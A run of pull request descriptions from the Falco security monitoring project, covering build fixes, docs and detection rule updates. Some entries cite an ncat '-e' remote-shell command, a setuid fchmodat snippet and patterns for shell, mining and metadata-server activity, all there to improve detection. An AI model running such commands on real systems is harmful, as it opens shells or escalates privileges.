When using the GitHub CMake integration, it expects a real user to be present via /etc/passwd. There are ways around this when building on a linux host via the Falco docker builder container, but on a Mac it gets a bit harder. Moving cmake to use curl and pull the yamlcpp tarball via S3 removes the dependency on a local user existing. 
Also, when building via the docker builder, I got warnings (which were treated as errors by GCC) about variable initialization order. Reordered the variables in question to get get rid of the errors, however I'm not sure if we need to check the compiler flags we are using in the Falco docker build container as I haven't seen this before.

Fix errors when building via docker from MacOS

---

userspace/falco/falco.cpp

Signed-off-by: Spencer Krum <nibz@spencerkrum.com>
sysdig-CLA-1.0-contributing-entity: International Business Machines
sysdig-CLA-1.0-signed-off-by: Spencer Krum <skrum@us.ibm.com>

Add containerd related flags

---

.travis.yml
CMakeLists.txt
docker/CMakeLists.txt
docker/dev/Dockerfile
docker/local/CMakeLists.txt
docker/local/Dockerfile
docker/local/rules/CMakeLists.txt
docker/local/traces/CMakeLists.txt
docker/stable/Dockerfile
docker/tester/Dockerfile
docker/tester/entrypoint.sh
scripts/jenkins/build-pipeline/Jenkinsfile
scripts/jenkins/build-pipeline/build.sh
scripts/jenkins/build-pipeline/run-tests.sh
test/CMakeLists.txt
test/falco_test.py
test/falco_tests.yaml
test/falco_tests_package.yaml
test/run_regression_tests.sh
test/trace_files/CMakeLists.txt
test/trace_files/k8s_audit/CMakeLists.txt

Changes to replace travis checks with jenkins.

Add jenkins checks

---

userspace/falco/falco.cpp

Added `cri` to `long_options` else you can't use the `--cri` flag. Also fixed a typo in the usage description for the `--cri` flag.

Add cri to long_options, fix typo

---

rules/falco_rules.yaml

It is specifically used a lot in alpine-based images.

Add `ash` to the list of shell binaries

---

CHANGELOG.md

This PR simple adds a reference to PR which introduced support for cri-o container metadata caching into Sysdig.

changelog missing reference to cri-o container metadata caching

---

examples/k8s_audit_config/README.md
examples/k8s_audit_config/apiserver-config.patch.sh
examples/k8s_audit_config/audit-sink.yaml.in
examples/k8s_audit_config/enable-k8s-audit.sh

In K8s 1.13, there's a new mechanism for k8s audit logs using Audit
Sinks, which can be created and managed like other k8s objects.
Add instructions for enabling k8s audit logging for 1.13. The patching
script is still required, as dynamic audit is not a GA feature and needs
to be enabled. Also, the audit sink config is a template and needs to be
filled in with the cluster ip address, like the webhook config for 1.11.
fixes #611

Add instructions for k8s audit support in >= 1.13

---

README.md

jobs were migrated from travis-ci.org to .com, this pr fixes the badges

fix travis ci badges

---

rules/falco_rules.yaml

Correcting typo in `- rule: Launch Suspicious Network Tool in Container` and updating and including the google accounts daemon in the `Read sensitive file untrusted` rule.
New versions of gke have the google_accounts daemon running stuff at
`proc.aname[3]`

Default Rule adjustments

---

rules/falco_rules.yaml

Add exception for `write below etc`:
`etcd-manager` will consistently updates dns: `/etc/hosts` file. This happens when k8s cluster created by `kops`
add new rule: `create symlinks over sensitive files and directories`

rule update: add exception for write below etc 

---

userspace/falco/falco.cpp

For a while, falco has set the inspector drop mode to 1, which should
discard several classes of events that weren't necessary to use most
falco rules.
However, it was mistakenly being called before the inspector was opened,
which meant it wasn't actually doing anything.
Fix this by setting the dropping mode after the inspector open.
On some spot testing on a moderately loaded environment, this results in
a 30-40% drop in the number of system calls processed per second, and
should result in a nice boost in performance.

Set dropping mode after open so it is effective

---

userspace/engine/ruleset.cpp

In the case where a rule name can't be compiled as a regex, fall back to
a substring search instead.

Handle rule patterns that are invalid regexes

---

README.md

I have made minor language edits to fix the following;
* Punctuation
* Typos
* Parallelism
* Clarity.
Example: Such as (inclusion) vs Like (comparison).
falco-CLA-1.0-signed-off-by: Radhika Puthiyetath <radhika.pc@gmail.com>

docs: minor language edits

---

rules/k8s_audit_rules.yaml

Please note
registry.access.redhat.com/sematext/agent,
registry.access.redhat.com/sematext/logagent
are not available yet, but we are in the process of certification ...

Add Sematext Monitoring & Logging agents to trusted k8s containers

---

rules/falco_rules.yaml

fixed the grep binaries list that had `egre` instead of `egrep`
added the ncat command line arguments `-c` and `-e` that can be used to spawn remote shells
Launching this : ` ncat -l localhost 4443 -e "/bin/ls"`
would not match anything when running: `sudo sysdig "proc.name = \"ncat\" and (proc.args contains \"--sh-exec\" or proc.args contains \"--exec\")"`
using `sudo sysdig "proc.name = \"ncat\" and (proc.args contains \"--sh-exec\" or proc.args contains \"--exec\" or proc.args contains \"-e\")"` fixes this

fix egrep rule and ncat rule

---

rules/falco_rules.yaml

Some newer distros default to Python 3 by default, not 2, which causes Ansible to trigger these rules.

Allow Ansible to run using Python 3

---

rules/falco_rules.yaml

IBM Cloud Kubernetes Service is a hosted k8s from IBM. (Sometimes referred to as IKS)

Add rules for running with IBM Cloud Kubernetes Service

---

userspace/engine/falco_engine.cpp
userspace/engine/falco_engine.h
userspace/engine/ruleset.cpp
userspace/engine/ruleset.h

Add more accurate tracking of the number of falco rules loaded per
ruleset, which are made available via the engine method
::num_rules_for_ruleset().
In the ruleset objects, keep track if a filter wrapper is actually
added/removed and if so increment/decrement the count.

Better tracking of rule counts per ruleset

---

rules/falco_rules.yaml
rules/k8s_audit_rules.yaml
test/falco_k8s_audit_tests.yaml
test/rules/k8s_audit/trust_nginx_container.yaml

Previously, the exceptions for Launch Privileged Container/Launch
Sensitive Mount Container came from a list of "trusted" images and/or a
macro that defined "trusted" containers. We want more fine-grained
control over the exceptions for these rules, so split them into
exception lists/macros that are specific to each rule. This defines:
- privileged_images: only those images that are known to require
privileged=true
- privileged_containers: uses privileged_images and (for now) still
allows all openshift images
- user_privileged_containers: allows user exceptions
- sensitive_mount_images: only those images that are known to perform
sensitive mounts
- sensitive_mount_containers: uses sensitive_mount_images
- user_sensitive_mount_containers: allows user exceptions
For backwards compatibility …

wip: Clean up privileged/sens mount container rules

---

CONTRIBUTING.md

We need to teach ourselves and our users about the triaging process for issues (and about the label setup we have).
Fixes #663 
Not listed any label combination we have since that will be responsibility of an automatically generated label document.
```release-note
NONE
```

Triaging issues

---

README.md

No
We recently, in #644 we added a contributing file that deprecates the content in readme.
I also added the Falco logo to the readme to make the repo cute.
No
Hello reviewer, be kind
```release-note
NONE
```

new: improve docs for new contributors

---

rules/falco_rules.yaml

1. Extend macro mkdir with syscall mkdirat (#337)
2. add placeholder for whitelist in rule Clear Log Activities (#632)
>
/kind bug
> /kind design
/kind feature
/kind rule/update
> /area engine
/area rules
Address #337 and #632 
Fixes #
#337 
#632 
**Special notes …

rule update (mkdirat + clear log activities placeholder) 

---

integrations/k8s-using-daemonset/README.md

Signed-off-by: Naoki Oketani <okepy.naoki@gmail.com>
This PR removes extra (duplicated) words in the k8s-using-daemonset document.
before: `you'll need to first need to copy ...`
after: `you'll first need to copy ...`
NONE
```release-note
NONE
```

docs: remove extra words

---

rules/falco_rules.yaml

>
/kind bug
> /kind design
/kind rule/create
> /area engine
/area rules
For backport compatibility
Fixes # …

rule update: add back trusted_containers list for backport compatibility

---

CMakeLists.txt

/kind feature
It allows to specify a path where to find the sysdig source when building Falco.
In this way the two projects don't have to stay in the same top level directory.
```
cmake -DSYSDIG_DIR=/my/path/to/sysdig ..
```
Be kind
```release-note
build: ability to specify a custom path for the sysdig source code
```

new: SYSDIG_DIR can be passed as cmake option

---

CMakeLists.txt

/kind cleanup
NONE
There was a mistake in how the SYSDIG_DIR option had been made.
We were kind of sure that it was just fine but discovered that it's not like that.
```release-note
NONE
```

hotfix: SYSDIG_DIR not as an option but as a set

---

userspace/engine/falco_engine_version.h

/kind feature
```release-note
supporting new fields (container.readiness_probe, container.liveness_probe , proc.is_container_readiness_probe , roc.is_container_liveness_probe)
```

update: fields checksum

---

rules/falco_rules.yaml

/kind feature
```release-note
fields: supporting new fielew (container.readiness_probe, container.liveness_probe , proc.is_container_readiness_probe , roc.is_container_liveness_probe)
```

rule update: add exception for rule change thread namespace

---

.gitignore
CMakeLists.txt

/kind bug
Fixes some cmake components in order to build Falco from source.
Fixes #674 
This PR depends on https://github.com/draios/sysdig/pull/1441.
Since 1441 is based on the current sysdig dev branch this PR also changes the falco fields checksum because of the new liveness/readiness probe fields.
```
diff falcofieldsnew falcofieldsold                                                                  
86,87d85
< proc.is_container_liveness_probe
< proc.is_container_readiness_probe
170,171d167
< container.liveness_probe
< container.readiness_probe
``` …

cmake fixes

---

.clang-format

This coding convention's solely goal is to approximately match the current code style.
It MUST not be intended in any other way until a real and definitive coding convention is put in.
/kind feature
It simply adds an initial `.clang-format` coding style file.
This is the first step o a broader refactoring and cleanup me and @fntlnz intend to do.
Refer to the below linked issue for ideas, proposals, or just reference.
Also notice that this PR does not introduce any real enforcement of the coding style neither locally in the IDEs/editos neither via CI checks.
Refs #688
```release-note …
```

new: initial clang format file

---

rules/falco_rules.yaml

>
> /kind bug
> /kind design
/kind rule/update
> /area engine
/area rules
Improve whitelisting to reduce false positive
Fixes #
1. add placeholder for rules write below root/etc
2. add `weaveworks/scope` to whitelist in rule change thread namespace …

Rule updates 2019 06.v4

---

.github/PULL_REQUEST_TEMPLATE.md

Signed-off-by: leodidonato@gmail.com
>
> /kind bug
/kind cleanup
> /kind design
> /area engine
> /area rules
This is needed because Prow (and so @poiana) matches only against the first slash. Thus labels cannot contains other slashes.
There was a mismatch between the PR template …

fix PR template for kind/rule-*

---

.github/PULL_REQUEST_TEMPLATE.md

Some refinements and improvements to the GitHub PR template.
>
> /kind bug
/kind cleanup
> /kind design
> /area engine
> /area rules
**Special …

update(.github): PR template

---

.clang-format
tests/engine/test_token_bucket.cpp
userspace/engine/token_bucket.cpp
userspace/engine/token_bucket.h

/kind cleanup
@mstemm pointed out that our new clang format wasn't really following the current code style.
We added a clang format created by @gianlucaborello that is better to match the current style and reformatted the files from #692 
NONE
```release-note
NONE
```

chore: clang format following the current style

---

scripts/CMakeLists.txt
tests/CMakeLists.txt
userspace/engine/CMakeLists.txt
userspace/falco/CMakeLists.txt

/kind cleanup
NONE
> /area engine
> /area rules
It fixes users of the falco engine, falco, and falco_tests as a library by adding a gate for SYSDIG_DIR.
🐶 
```release-note
NONE
```

update: sysdig dir gate in subdirectories

---

userspace/engine/falco_engine.cpp
userspace/engine/json_evt.cpp
userspace/engine/json_evt.h
userspace/engine/lua/compiler.lua
userspace/engine/lua/parser.lua
userspace/engine/lua/rule_loader.lua
userspace/engine/rules.cpp
userspace/engine/rules.h

>
> /kind bug
> /kind design
/kind feature
/area engine
> /area rules
Improve rule loading performance by optimizing lua parsing paths to avoid expensive pattern matches.
Fixes # …

Faster rules validation

---

userspace/engine/falco_engine_version.h
userspace/engine/json_evt.cpp

/kind feature
/kind cleanup
NONE
/area engine
- Adds the `ka.useragent` field as alias of jevt.value[/userAgent]
- Doing this also required another commit to do the necessary formatting according to the new `.clang-format`
Fixes #698 
```release-note
fields: kubernetes audit ka.useragent alias
```

ka.useragent field

---

.cmake-format

/kind feature
NONE
Adds a `.cmake-format` file.
```release-note
NONE
```

cmake format

---

userspace/engine/falco_engine_version.h

/kind feature
/area engine
/area rules
We need to bump the engine version in order to signal that `ka.useragent` alias (https://github.com/falcosecurity/falco/pull/709) is available starting from engine version 4.
NONE
```release-note
bump falco engine to version 4
```

bump falco engine version

---

rules/falco_rules.yaml

/area rules
Add `runc` to the list of possible parents in the `container_entrypoint` macro since the `docker-` prefix added to the binary has been removed starting with Docker CE version 18.09.
Without this, rules like "Terminal shell in container" were not triggered when expected while using recent Docker releases.
See https://github.com/docker/docker-ce/releases/tag/v18.09.0 ("Remove 'docker-' prefix for containerd and runc binaries docker/engine#61 / moby/moby#37907, https://github.com/docker/docker-ce-packaging/pull/241")
```release-note
add runc to the list …
```

Add runc to the list of possible container entrypoint parents

---

.yamllint.conf

/kind feature
NONE
This PR simply adds a basic [yamllint](https://yamllint.readthedocs.io/en/stable/) configuration in order to also start the process of establish (and document) the coding style of the repo's YAML files (rules, falco config etc.).
The YAML lint config created extends the default one disabling some linting rules in order to minimize the mismatch from the current YAML style the repo contains.
Please notice this PR does NOT reformat any YAML file.
Refs #619 
```release-note
NONE
```

YAML linter configuration

---

rules/falco_rules.yaml

Extra parentheses broke the Terminal check
Co-Authored-By: Michael Ducy <michael@ducy.org>
Signed-off-by: Spencer Krum <skrum@us.ibm.com>
/kind bug
/area rules
The rule was broken, this fixes it.
```release-note
The Terminal shell in container rule works again.
```

Fix shell_procs macro

---

userspace/falco/falco.cpp

/kind bug
/area engine
When falco is started in daemon node, it does not carry the threads related to container metadata and in general all the other threads done before the fork because `fork` only carries the main thread.
This solves that problem by moving all the thread openings after fork.
Fixes #716
Here are packages to test:
DEB
Download: https://falco-dev-public.s3.amazonaws.com/pr-731/falco-fntlnz-test-x86_64.deb
Sha256: 1586eea70cd750f730341a0dfa83275d7893fa5aca0c0f0929d0b3df5557c000  falco-fntlnz-test-x86_64.deb
RPM
Download: https://falco-dev-public.s3.amazonaws.com/pr-731/falco-fntlnz …

fix: do the inspector after forking for daemon mode

---

userspace/engine/lua/rule_loader.lua

Just being tolerant given that the comparison used to be entirely
case-insensitive.
Also quote all the strings to avoid conflict with potential lua keywords
error/debug.
> /kind bug
/kind cleanup
> /kind design
/area engine
> /area rules
Fixes #
**Special notes for …

Allow all lowercase priorities

---

rules/falco_rules.yaml

/kind feature
/area rules
This PR adds the cAdvisor and Node Expoter image to the whitelist of containers so that Falco does not report. (Rule: Launch Sensitive Mount Container)
Fixes #735
The cAdvisor and Node Exporter containers are no longer trigger the rule: Launch Sensitive Mount Container
```release-note
Allow prom/node-exporter and google/cadvisor to mount sensitive paths
```

Rules add cadvisor node exporter

---

test/falco_test.py
test/falco_tests.yaml
test/rules/rule_names_with_regex_chars.yaml
userspace/engine/falco_engine.cpp
userspace/engine/falco_engine.h
userspace/engine/ruleset.cpp
userspace/engine/ruleset.h
userspace/falco/falco.cpp

/kind bug
> /kind design
/area engine
> /area rules
Fixes #742
```release-note
Change the semantics of -D (disable rules) to work on rule substrings instead of regex …
```

Enable rules using patterns not regexes

---

userspace/engine/lua/rule_loader.lua

/kind bug
/area engine
Fix a couple of small bugs when verifying macro/rule objects:
1) Yaml can have document separators "---", and those were mistakenly
being considered array items.
2) When reading macros and rules and using array position to find the
right document offset, the overall object order should be
used (e.g. this is the 5th object from the file) and not the array
position (e.g. this is the 3rd rule from the file).
Fixes #
```release-note
Fix small bugs when displaying context from rule validation/loading errors.
```

Fix bugs when verifying macro/rule objects.

---

test/falco_tests.yaml
test/rules/invalid_append_macro.yaml
test/rules/invalid_append_rule.yaml
test/rules/invalid_base_macro.yaml
test/rules/invalid_base_rule.yaml
test/rules/invalid_overwrite_macro.yaml
test/rules/invalid_overwrite_rule.yaml
userspace/engine/lua/rule_loader.lua

/kind feature
/area engine
NONE
```release-note
Further improve rule validation output to handle rule/macro overwrites and appends.
```

Fix addl rules validation errors

---

rules/falco_rules.yaml

/area rules
Fixes #745 
```release-note
Add exception for rule Write below rpm, this is a FP caused by amazon linux 2 yum.
```

rule update: add exception for write below rpm (#745)

---

test/falco_tests.yaml
test/rules/invalid_append_macro_multiple_docs.yaml
test/rules/invalid_append_rule_multiple_docs.yaml
test/rules/invalid_overwrite_macro_multiple_docs.yaml
test/rules/invalid_overwrite_rule_multiple_docs.yaml
test/rules/multiple_docs.yaml
userspace/engine/lua/rule_loader.lua

> /kind bug
/kind cleanup
> /kind design
/area engine
> /area rules
Fixes #
```release-note
Handle multi-document yaml files when reading rules files.
```

Handle multi doc rules files

---

rules/falco_rules.yaml

/kind bug
/area rules
When deleting a shell history file we can't rely on the name of the command deleting it.
This PR uses the rmdir, unlink and unlinkat syscalls instead to reliably detect if an history file had been deleted.
NONE
```release-note
rules: Delete Bash History is renamed to Delete or rename shell history
rules, Delete or rename shell history: When deleting a shell history file now the syscalls are taken into account rather than just the commands deleting the files …
```

fix: make sure that when deleting shell history the system call is taken into account

---

rules/falco_rules.yaml

Add rules detect `crypto mining` 
> /kind bug
> /kind design
> /area engine
/area rules
Fixes #
N/A
```release-note
Add …
```

rule update: add rules for crypto mining

---

.gitignore
tests/CMakeLists.txt
tests/falco/test_webserver.cpp
userspace/engine/falco_engine.cpp
userspace/falco/webserver.cpp

/kind bug
NONE
Fixes #
I'd like to add (me or someone else) unit tests to this PR too. Anyway it could be merged also just as is.
```release-note
Improvements to how the webserver handles incoming invalid inputs
```

Fix webserver errors

---

rules/falco_rules.yaml

/kind bug
/area rules
The "Set Setuid or Setgid bit" rule is using a check on the invocation of the `chmod` command in order to check if a suid or sgid flag is applied to a file.
That method is ineffective because anyone using the raw syscall or glibc can bypass that.
For example:
```bash
#include <sys/stat.h>
#include <fcntl.h>
int main ()
{
fchmodat(AT_FDCWD, "/tmp/yo", S_ISUID, 0);
}
```
This PR uses the newly added `fchmod, chmod, fchmodat` syscalls (to sysdig)
in order to avoid that.
NONE
Only works if sysdig PR …

fix(rules/Set Setuid or Setgid bit): use chmod syscalls instead of chmod command

---

CMakeLists.txt

/kind cleanup
All the build dependencies are now pulled over https.
```release-note
NONE
```

new: download all dependencies over https

---

rules/falco_rules.yaml

/area rules
In "Create Hidden Files or Directories", when a directory or a file is created the rule is triggered but it should also trigger when a file or directory is moved to become and hidden one, this PR uses the `modify` macro to do that additional check.
In "Update Package Repository" when a directory or a file is updated in the sensitive packages folder the rule is triggered, however it was not triggered when a file is moved into those directories. This PR fixes that using the `modify` macro.
NONE …

rules: strict checks on hidden files and repository files that are modified

---

docker/local/Dockerfile

/kind bug
Debian unstable recently changed the dependency tree, we now need to include specific packages in the local dockerfile.
Fixes #781
```release-note
NONE
```

Fix build dependencies for the local dockerfile

---

README.md
userspace/falco/falco.cpp

/kind feature
NONE
This PR introduces a flag for the Falco CLI, `--disable-source=(syscall|k8s_audit)`.
It modifies the Falco behaviour accordingly (ie., the way it open the inspector).
Fixes #730 
Refs #725 
The `--disable-source` flag accepts only the following values: `syscall`, `k8s_audit`. Other values are detected and discarded.
This flag can be specified multiple times (for future need).
Nevertheless the user can not disable `syscall` and `k8s_audit` event sources at the same time.
```release-note
add flags to disable `syscall` event …
```

Ability to disable event sources

---

test/falco_test.py
test/run_regression_tests.sh

As of 0e1c436d14fb468dd1530115ed19e43faa0a8331, the build directory is
an argument to run_regression_tests.sh. However, the build directory in
falco_tests.yaml is currently hard-coded to /build, with the build
variant influencing the subdirectory.
Clean this up so the entire build directory passed to
run_regression_tests.sh is passed to avocado and used for the build
directory.
> /kind bug
/kind cleanup
> /kind design
**Any specific area of the …

Pass the build dir along when running tests

---

docker/stable/Dockerfile

added `libmpx2` to be installed during `apt-get install` which is a dependency for `dpkg: libgcc-6-dev:amd64`
/kind bug
> /kind design
> /area engine
> /area rules
/area deployment
Fixes #814 …

fix(docker/stable): fix libgcc-6-dev dependencies

---

.github/PULL_REQUEST_TEMPLATE.md
docker/OWNERS
examples/OWNERS
integrations/OWNERS
rules/OWNERS
test/OWNERS
tests/OWNERS
userspace/engine/OWNERS

NONE
Specifies an OWNER file for every (almost) every sub-section we have.
The OWNERs file only contain the `labels` field (in most cases): this should make Prow automatically assign the labels specified when the files in the directory of the OWNER file have been modified by a PR.
Furthermore this PR improves the PR template accordingly.
```release-note
NONE
```

Automatic area/* labels

---

userspace/engine/falco_common.h
userspace/engine/falco_engine.cpp
userspace/falco/falco_outputs.cpp

/kind bug
/area engine
We need that the concurrent access to Lua state is thread-safe.
```release-note
fix: make lua state access thread-safe
```

Make lua state access thread-safe

---

userspace/falco/output.proto

NONE
Explains the `keepalive` option of the gRPC Outputs API's `request`s.
NONE
NONE
```release-note
NONE
```

documenting the keepalive field of the gPRC outputs API

---

userspace/falco/grpc_server.cpp

I wasn't able to compile the dev branch with gcc 5.4 (e.g. not using the
builder), getting this error:
```
.../falco/userspace/falco/grpc_server.cpp:40:109: error: specialization of ‘template<class Request, class Response> void falco::grpc::request_stream_context<Request, Response>::start(falco::grpc::server*)’ in different namespace [-fpermissive]
void falco::grpc::request_stream_context<falco::output::request, falco::output::response>::start(server* srv)
^
In file included from .../falco/userspace/falco/grpc_server.cpp:26:0:
.../falco/userspace/falco/grpc_server.h:102:7: error:   from definition of ‘template<class Request, class Response> void falco::grpc::request_stream_context<Request, Response>::start(falco::grpc::server*)’ [-fpermissive]
void start(server* srv);
```
It looks like …

Specify namespace compat w/ gcc 5

---

integrations/k8s-using-daemonset/k8s-with-rbac/falco-daemonset-configmap.yaml
integrations/k8s-using-daemonset/k8s-without-rbac/falco-daemonset.yaml

/kind bug
/kind design
/area deployment
This PR improves the security posture of falco container deployment by only allowing readOnly access to `/dev` on underlying host. Following the [least-privilage access principle](https://en.wikipedia.org/wiki/Principle_of_least_privilege) is a nice to have, especially for a security tool itself.
Fixes #
I tested this change locally on minikube. Falco container was able to correctly load kernel modules and start cleanly. I also tested the detection by falco when a privileged container is spawned. …

fix(permissions): Restrict to RO access to /dev on underlying host

---

tests/CMakeLists.txt

When I try to build the dev branch using the docker builder, the tests
target isn't properly checking out and building catch2 for the
dependency catch2.hpp. Adding this explicit dependency allowed the build
to succeed.
/kind bug
> /kind design
/area build
> /area engine
> /area rules
> /area tests
**What this PR does / why we need it**: Add …

Add explicit catch2 dependency for tests

---

proposals/20190909-psp-rules-support.md

> /kind bug
> /kind design
> /area engine
> /area rules
Fixes #
```release-note
NONE
```

Proposal add psp rules support

---

test/falco_k8s_audit_tests.yaml
test/rules/k8s_audit/engine_v4/allow_nginx_container.yaml
test/rules/k8s_audit/engine_v4/allow_only_apache_container.yaml
test/rules/k8s_audit/engine_v4_k8s_audit_rules.yaml
userspace/engine/falco_engine_version.h
userspace/engine/json_evt.cpp
userspace/engine/json_evt.h

/kind bug
> /kind design
> /area build
/area engine
> /area rules
/area tests
Fixes #
```release-note
Fix falco engine compatibility with older k8s audit rules files. …
```

Add compat old k8s filter fields

---

test/falco_test.py
test/falco_tests_psp.yaml
test/psps/privilege_escalation.yaml
test/psps/supplemental_groups_may_run_as_30_40_10_15.yaml
test/psps/supplemental_groups_must_run_as_30_40_10_15.yaml

Use the changes in https://github.com/falcosecurity/falcoctl/pull/25
that make sure rules, macros, lists, and rule names all have a unique
prefix. In this case the prefix is based on the psp name, so make sure
the psp name actually reflects what it does--there were a few
cut-and-paste carryovers.
This test assumes that falcoctl will be tagged/released as 0.0.3--the
tests won't pass until the falcoctl PR is merged and there's a release.
> /kind bug
/kind cleanup
> /kind design
> /kind …

Use falcoctl 0.0.3 w/ unique names

---

rules/k8s_audit_rules.yaml

> /kind bug
> /kind design
> /area build
> /area engine
/area rules
> /area tests
Include default users created by `kops`.
Some false positive are seen when k8s audit enabled
Fixes # …

rules update: expand list allowed_k8s_users

---

test/falco_test.py
test/falco_tests_psp.yaml
test/psps/privileged_name_with_dashes.yaml
test/psps/privileged_name_with_spaces.yaml

Use falcoctl, which properly handles psp names containing
spaces/dashes. Also add tests that verify that the resulting rules are
valid.
/kind bug
> /kind design
> /area build
> /area engine
> /area rules
> /area tests
Fixes # …

Use falcoctl 0.0.4+ tests for space/dash psp names

---

userspace/engine/rules.cpp

The call to rule_loader.load_rules only returns 2 values, so only pop
two values from the stack. This fixes #906.
/kind bug
> /kind design
> /area build
/area engine
> /area rules
> /area tests
Fixes # …

Don't pop excess values from stack

---

docker/kernel/linuxkit/Dockerfile

/kind bug
/kind cleanup
/area build
fixes the image name and tag for the linuxkit Dockerfile
```release-note
fix(docker/kernel/linuxkit): correct FROM for falco minimal image
```

fix the image name and tag for the linuxkit Dockerfile

---

rules/falco_rules.yaml

/kind feature
/area rules
The motivation of this new rule is to detect suspicious activity like seen in the Graboid threat (more details here: https://unit42.paloaltonetworks.com/graboid-first-ever-cryptojacking-worm-found-in-images-on-docker-hub/). 
There are rules for detection of miners, but not the scenario where the container is used to attack other vulnerable hosts via a docker client. 
Fixes #
The priority is set to WARNING, but I have doubts if it should be other. I don't have the experience enough to decide this part of the rule. …

Added rule to detect docker client in container

---

rules/falco_rules.yaml

> /kind bug
> /kind design
> /area build
> /area engine
/area rules
> /area tests
add docker-runc-cur to container_entrypoint macro
Exec into a container didn't trigger falco rule
Fixes # …

rules update: add docker-runc-cur to container_entrypoint macro

---

userspace/engine/json_evt.cpp

In all extraction functions, always catch json type errors alongside
json out of range errors. Both cases result in not extracting any value
from the event.
/kind bug
> /kind design
> /area build
/area engine
> /area rules
> /area tests
Fixes #
**Special …

Always catch json type errors when extracting

---

.travis.yml
CMakeLists.txt

/kind cleanup
/area build
I noticed that Falco wasn't compiling on some machines because gRPC was not being handled righty by CMake so I'm sending this with the needed changes.
Also I did some cleanup and changed the download url to be the one of the main project, checksums are matching.
This is also preparation work for https://github.com/falcosecurity/falco/issues/921 since we will need to update gRPC and this was needed to be prepared for that.
```release-note
NONE
```

update: cleanup the gRPC dependency and use the url from the main project

---

userspace/falco/falco.cpp
userspace/falco/falco_outputs.cpp
userspace/falco/falco_outputs.h
userspace/falco/lua/output.lua
userspace/falco/output.proto

Signed-off-by: Adrián Arroyo Calle <adrian.arroyocalle@gmail.com>
/kind feature
This PR adds a new field (hostname) in gRPC event messages.
Fixes #923
In theory, it adds a new field without causing trouble to old clients. It also passes hostname to other outputs but it does nothing. This was done to keep consistency between methods signatures. Maybe we want to move the field to `outputFields`
```release-note
adds a hostname field to gRPC output
```

feat: add hostname field in gRPC output

---

rules/falco_rules.yaml

/kind bug
/area rules
- Add kubelet to user_known_chmod_applications list
- Why we need it
- To reduce false positives
- I got massive false positives of "Setuid or setgid bit is set via chmod", because kubelet uses chmod syscall every time mounting configmap, secret and so on.
- Sample Flase Positive Log(GKE 1.14.8-gke.12 on Ubuntu)
```
output: "14:02:11.496777755: Notice Setuid or setgid bit is set via chmod (fd=<NA> filename=/var/lib/kubelet/pods/1029fd94-140a-11ea-93b8-42010a80001b/volumes/kubernetes.io~secret/heapster-token-5rjw6 …
```

rule update: Add kubelet to user_known_chmod_applications list

---

rules/falco_rules.yaml

/kind bug
/area rules
Since the upgrade to Falco 0.18.0, the "Set Setuid or Setgid bit" rule is enabled. That rule reports false positives each time we run a container. For example:
```JSON
{
"rule": "Set Setuid or Setgid bit",
"output": "2019-12-02T21:45:32.802828386+0000: Notice Setuid or setgid bit is set via chmod (fd=<NA> filename=/home/appuser mode=S_IXOTH|S_IROTH|S_IXGRP|S_IRGRP|S_IXUSR|S_IWUSR|S_IRUSR|S_ISGID user=root process=exe command=exe /var/lib/docker/overlay2/d06cc577802ae17ab015005a43d1370a3fdc039af0948cc05d0909e9a4404845/diff container_id=host container_name=host image=<NA>:<NA>) k8s.ns=<NA> k8s.pod=<NA> container=host …
```

Exclude exe_running_docker_save in the "Set Setuid or Setgid bit" rule

---

rules/falco_rules.yaml

/kind feature
/area rules
Changes I made:
\+ Add a simple user_known_package_manager_in_container_conditions macro
\* Use the user_known_package_manager_in_container_conditions macro in the "Launch Package Management Process in Container" rule
This is particularly useful when we need to ignore a Jenkins pod running jobs in a Kubernetes cluster.
I did not file an issue.
```release-note
rules: Added a user_known_package_manager_in_container macro to allow users to specify conditions that match a legitimate use case for using a …
```

Add a simple user_known_package_manager_in_container_conditions macro

---

CMakeLists.txt
cmake/patch/grpc-1.25.0-Makefile.patch

/kind bug
/area build
At the moment, Falco does not compile when glibc is > 2.3.0 .
This is because of some incompatibilities between gRPC and glibc, not caused by falco itself. See the PR on gRPC https://github.com/grpc/grpc/pull/18950
My proposed solution is to upgrade gRPC and protobuf to fix this.
Fixes #921
```release-note
NONE
```

wip: build: update gRPC to 1.25.0

---

rules/falco_rules.yaml
rules/k8s_audit_rules.yaml

> /kind bug
> /kind design
> /area build
> /area engine
/area rules
> /area tests
Add more sensitive host paths to `sensitive_mount` macro
N/A
Fixes #
**Does this PR introduce …

rules update: add more sensitive host path to sensitive_host_mount macro

---

rules/falco_rules.yaml

/kind feature
/area rules
- The motivation of this new rule is to detect access to GCE Instance Metadata.
- SSRF is still a threat to GKE, so I think it's good to have the rule.
- (Ref: https://hackerone.com/reports/341876)
- This rule doesn't turn on by default. To use this rule, a user has to overwrite gce_metadata_containers on local/user rules file.
Fixes #
- "169.254.169.254" is a metadata server on GKE(GCE).
- (Ref: https://cloud.google.com/compute/docs/storing-retrieving-metadata, …

rule update: Add rules to detect access to GCE Instance Metadata

---

rules/falco_rules.yaml

/kind bug
/area rules
In an environment where Docker in Docker is overly used, we see multiple events where `proc.cmdline` contains `exe / /var/lib/docker` (notice the `/` between `exe` and `/var/lib/docker`).
A common use-case for Docker in Docker in a Kubernetes cluster is a Jenkins agent running as a Kubernetes pod using the docker.io/library/docker:stable-dind Docker image. Such agent is used in a Jenkins job to build container images.
We already have the `exe_running_docker_save` macro:
```YAML
- macro: exe_running_docker_save
condition: (proc.cmdline startswith "exe /var/lib/docker" and proc.pname in (dockerd, docker))
```
but we did not had …

Update the exe_running_docker_save macro to support docker in docker

---

rules/falco_rules.yaml

/kind bug
/area rules
The "Modify Shell Configuration File" gets fired each time we launch a container.
```JSON
{
"output_fields": {
"container.id": "host",
"proc.cmdline": "exe /var/lib/docker/aufs/diff/2af477a6cb2dc69462ddd8aa43a147dab7cd86f7580d1766b2043143eb267d07",
"evt.time": 1575046614282228200,
"fd.name": "/etc/profile",
"user.name": "root"
},
"output": "16:56:54.282228311: Warning a shell configuration file has been modified (user=root command=exe /var/lib/docker/aufs/diff/2af477a6cb2dc69462ddd8aa43a147dab7cd86f7580d1766b2043143eb267d07 file=/etc/profile container_id=host image=<NA>)",
"rule": "Modify Shell Configuration File", …
```

Exclude exe_running_docker_save in the "Modify Shell Configuration File" rule

---

rules/falco_rules.yaml

/kind bug
/area rules
The "Update Package Repository" gets fired each time we launch a container.
```JSON
{
